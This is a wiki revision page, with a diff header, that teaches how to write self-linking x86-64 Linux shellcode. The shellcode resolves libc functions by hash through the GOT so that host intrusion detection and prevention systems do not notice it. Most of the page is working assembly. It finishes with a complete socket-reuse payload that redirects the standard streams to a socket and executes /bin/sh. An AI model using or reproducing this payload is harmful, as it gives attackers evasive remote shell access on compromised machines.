Difference between revisions of "Shellcode/Dynamic"
(→The invoking of functions) |
(→The invoking of functions) |
||
Line 132: | Line 132: | ||
</source>}} | </source>}} | ||
+ | * Now we zero the %rdx register and place the function hash into %rdi for future comparison. | ||
{{code|text=<source lang="asm">set_regs: | {{code|text=<source lang="asm">set_regs: | ||
xor %rdx, %rdx | xor %rdx, %rdx | ||
Line 138: | Line 139: | ||
</source>}} | </source>}} | ||
+ | * Then the base pointer of the desired library to import from is placed into %rbp | ||
{{code|text=<source lang="asm"> | {{code|text=<source lang="asm"> | ||
copy_base: | copy_base: | ||
Line 144: | Line 146: | ||
</source>}} | </source>}} | ||
+ | * This is a hack to get to our dynamic offset. We need to access 0x130(%rbx) for four bytes, but add it to an eight-byte register. We can't add to %ebx because this will chop %rbx in half - so we add the location of the dynamic section to the base pointer using [[indexed addressing mode]]. | ||
{{code|text=<source lang="asm">read_dynamic_section: | {{code|text=<source lang="asm">read_dynamic_section: | ||
push $0x4c | push $0x4c |
Revision as of 21:44, 22 November 2012
Dynamic, or self-linking code is built to evade several types of host-layer countermeasures from security infrastructure (such as HIDS and HIPS engines) that can prevent the execution of traditional 'unlinked' shellcode because it contains no interrupts, syscalls, or plaintext function strings.
Contents
Justification
Most security infrastructure components do runtime analysis based on the contents of RAM in both data and executable marked segments. Moreover, many of these systems may even inspect kernel interrupts and syscalls from within the kernel. Others may monitor the functionality of _ld_runtime_resolve, a trampoline to _dl_fixup(), provided by ld-linux for a normal application to make shared library calls. Many of these systems will be alerted by applications trying to execute syscalls or interrupts without having them in their .text segments, or when an application attempts to use _ld_runtime_resolve, _dl_fixup, dl_open, dl_close, or dl_sym to import a function not listed in its import table. Additionally, using functions such as dl_open() and dl_sym() require the use of plaintext strings. Any analyst with any level of common sense would be able to reverse engineer the payload quickly - another problem presented by traditional null-free shellcode.
A dynamic shellcode engine is able to solve these problems. By avoiding registers used by the C calling convention, it is possible to construct a linker that allows a developer to write dynamically self-linking code. This discards the need for interrupts and syscalls entirely, as a linker is able to import functions without assistance from the kernel. Additionally, function hashing is used to prevent function names from displaying within string data, solving the problems with standard null-free shellcode listed above.
The C Calling convention's impact
- The usual format for a system call or libc function invokation:
function_call(%rax) = function(%rdi, %rsi, %rdx, %r10, %r8, %r9) |
- The return value is usually returned into the %rax register.
Because of the above statement, we can see easily when writing a linker that the following registers need not be reserved for function calls before calling them without syscalls:
%rax, %rbx, %rcx, %rbp, %r11, %r12, %r13, %r14, %r15 |
Most of these registers can get blown away by different libc functions, however %rbx is reserved for "developer use" by libc. When writing a dynamic linker, function arguments must be preserved so that a developer can easily write dynamically integrated code. To that end, this linker takes %rbx as the base pointer to a library and %rbp for a function hash. This ensures that the developer maintains control over %rax, %rdi, %rsi, %rdx, %r10, %r8, and %r9. The %rcx register is used as the pointer to the invoke_function label. Developers should be aware to preserve this when invoking functions which may destroy the register, or change this by changing the register popped in the __initialize_world label.
Function hashing
- Additional labels have been added to make this more readable.
calc_hash: preserve_regs: push %rax push %rdx initialize_regs: push %rdx pop %rax cld calc_hash_loop: lodsb rol $0xc, %edx add %eax, %edx test %al, %al jnz calc_hash_loop calc_done: push %rdx pop %rsi restore_regs: pop %rdx pop %rax |
Dynamic section traversal to the GOT
- We were able to locate a predictable offset to the first dynamic section header in the currently executing binary. It will always have a VMA of 0x00400130, so we use the code below to get there without nulls.
_start: push $0x400130ff pop %rbx shr $0x8, %ebx |
- Here, we extract the pointer to the dynamic section, then add its length to it. The GOT (Global Offset Table) is immediately after the dynamic section, so we can traverse to the GOT without reading its location from the headers. That's good, because the location of the GOT is not stored in the ELF or program headers.
fast_got: mov (%rbx), %rcx add 0x10(%rbx), %rcx |
Extracting a library pointer
- This code extracts a pointer to an arbitrary function inside of libc from the GOT. An alternative to libc is at 0x18(%rcx), which is a pointer to _dl_runtime_resolve from the ld-linux shared object library.
extract_pointer: mov 0x20(%rcx), %rbx |
- Now we just look for the base pointer of the binary we've selected for importing. We do this by looking for \x7f followed by the text string ELF. Because the RAM holds the information backwards, we run a backwards comparison. We loop until the base pointer has been isolated:
find_base: dec %rbx cmpl $0x464c457f, (%rbx) jne find_base |
Staging the user defined code
- Now that a base pointer has been calculated, it is time to stage the developer or user-defined code. To make invoke_function re-usable from a register, a getPc via %rcx is invoked that jumps to the _world label and never returns. The address of invoke_function has then been stored in the %rcx register, allowing developers to access it efficiently.
jmp startup __initialize_world: pop %rcx jmp _world startup: call __initialize_world invoke_function: ... _world: ; user-defined code goes here |
The interface
The runtime linker developed here allows user-defined code to start at the _world label. This example is a small dynamic snippet that when combined with the linker's API equivocates to `exit()':
_world: push $0x696c4780 pop %rbp xor %rdi, %rdi call *%rcx |
The invoking of functions
- A comment has been provided in case developers forget the interface functionality:
; ; Takes a function hash in %rbp and base pointer in %rbx ; >Parses the dynamic section headers of the ELF64 image ; >Uses ROP to invoke the function on the way back to the ; -normal return location ; ; Returns results of function to invoke. ; |
- The first thing that we have to do is preserve all the registers that may interact with libc along with any registers that may be used by the linker. You'll notice that %rbp is preserved twice. This is because the first preservation is overwritten with a pointer to the desired function before returning. This allows us to return from the desired function back to developer-defined code.
invoke_function: push %rbp push %rbp push %rdx push %rdi push %rax push %rbx push %rsi |
- Now we zero the %rdx register and place the function hash into %rdi for future comparison.
set_regs: xor %rdx, %rdx push %rbp pop %rdi |
- Then the base pointer of the desired library to import from is placed into %rbp
copy_base: push %rbx pop %rbp |
- This is a hack to get to our dynamic offset. We need to access 0x130(%rbx) for four bytes, but add it to an eight-byte register. We can't add to %ebx because this will chop %rbx in half - so we add the location of the dynamic section to the base pointer using indexed addressing mode.
read_dynamic_section: push $0x4c pop %rax add (%rbx, %rax, 4), %rbx |
check_dynamic_type: add $0x10, %rbx cmpb $0x5, (%rbx) jne check_dynamic_type |
string_table_found: mov 0x8(%rbx), %rax # %rax is now location of dynamic string table mov 0x18(%rbx), %rbx # %rbx is now a pointer to the symbol table. |
check_next_hash: add $0x18, %rbx push %rdx pop %rsi xorw (%rbx), %si add %rax, %rsi |
calc_hash: ... |
check_current_hash: cmp %esi, %edi jne check_next_hash |
found_hash: add 0x8(%rbx,%rdx,4), %rbp mov %rbp, 0x30(%rsp) pop %rsi pop %rbx pop %rax pop %rdi pop %rdx pop %rbp ret |
The dynamic shell
- Once added to the linker, this becomes a total of a 270 byte dynamic port of the 115 byte socket-reuse payload. There are a few ways to optimize it that will be left for the reader to discover.
_world: movl $0xf8cc01f7, %ebp # hash of getpeername() is in %rbp push $0x02 pop %rdi make_fd_struct: lea -0x14(%rsp), %rdx movb $0x10, (%rdx) lea 0x4(%rdx), %rsi # move struct into rsi loop: inc %di jz exit stack_fix: lea 0x14(%rdx), %rsp get_peer_name: sub $0x20, %rsp push %rcx call *%rcx # getpeername(counterfd,sockaddr_in) pop %rcx check_pn_success: test %al, %al jne loop # If we make it here, rbx and rax are 0 check_ip: push $0x1b pop %r8 mov $0xfeffff80, %eax not %eax cmpl %eax, (%rsp,%r8,4) jne loop check_port: movb $0x35, %r8b mov $0x2dfb, %ax not %eax cmpw %ax,(%rsp, %r8 ,2) # jne loop push $0x70672750 pop %rbp # Function hash of dup2() is in rbp reuse: xor %rdx, %rdx push %rdx push %rdx pop %rsi dup_loop: # redirect stdin, stdout, stderr to socket push %rcx call *%rcx # dup2(sockfd,std[err|in|out]); pop %rcx inc %esi cmp $0x4, %esi jne dup_loop movl $0xf66bbb37, %ebp # Place the function hash for execve() into %rbp xor %rdi, %rdi push %rdi push %rdi pop %rsi pop %rdx # Null out %rdx and %rdx (second and third argument) mov $0x68732f6e69622f6a,%rdi # move 'hs/nib/j' into %rdi shr $0x8,%rdi # null truncate the backwards value to '\0hs/nib/' push %rdi push %rsp pop %rdi # %rdi is now a pointer to '/bin/sh\0' call *%rcx # execve('/bin/sh',0,0); |